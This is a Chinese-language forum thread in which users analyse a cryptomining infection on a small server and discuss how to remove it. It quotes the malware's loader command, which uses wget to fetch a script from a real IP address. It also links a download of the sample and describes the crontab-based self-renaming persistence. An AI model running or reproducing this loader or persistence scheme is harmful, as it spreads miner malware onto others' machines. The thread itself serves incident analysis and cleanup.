小鸡中挖矿病毒怎么解决

rwind · 发表于 2021-6-11 21:55:01

gyjys43043 发表于 2021-6-11 21:31
挖矿程序发出来给大家研究下呗

https://cloud.189.cn/t/AR7bUbaQNbMj (访问码:7mb0)
还在找，这应该是一个因为账号权限不高我看看破坏哪些文件了

gyjys43043 · 发表于 2021-6-12 00:04:37

rwind 发表于 2021-6-11 21:55
https://cloud.189.cn/t/AR7bUbaQNbMj (访问码:7mb0)
还在找，这应该是一个因为账号权限不高我看看破坏哪 ...

这程序有点意思，居然还对cpu超频

sh -c "/sbin/modprobe msr > /dev/null 2>&1"

天权璇玑 · 发表于 2021-6-12 00:13:01

重装系统

dole · 发表于 2021-6-12 00:39:11

备份重要文件直接dd

gyjys43043 · 发表于 2021-6-12 10:57:26

本帖最后由 gyjys43043 于 2021-6-12 11:05 编辑

这个挖矿程序的原理是
1. 会创建两个进程，一个主进程一个守护进程，并且运行后会立刻删掉磁盘上的文件
2. 任何一个进程被杀掉后，另外一个进程会立刻将自己重命名成一个随机的名字，并保存到一个随机文件夹下
3. 同时将刚保存的新文件路径写入到crontab中
以上就实现了循环启动

要杀掉它也很简单，并写脚本同时杀掉两个进程,并读取crontab然后删除那个随机文件

rwind · 发表于 2021-6-12 14:26:23

gyjys43043 发表于 2021-6-12 10:57
这个挖矿程序的原理是
1. 会创建两个进程，一个主进程一个守护进程，并且运行后会立刻删掉磁盘上的文件
2. ...

昨天随便看了一下
wget --user-agent e39dc295 -q -O - 194.145.227.21/ldr.sh
这脚本基本把思路是这样

		自动登录	找回密码
密码			注册

[lighttpd] 小鸡中挖矿病毒怎么解决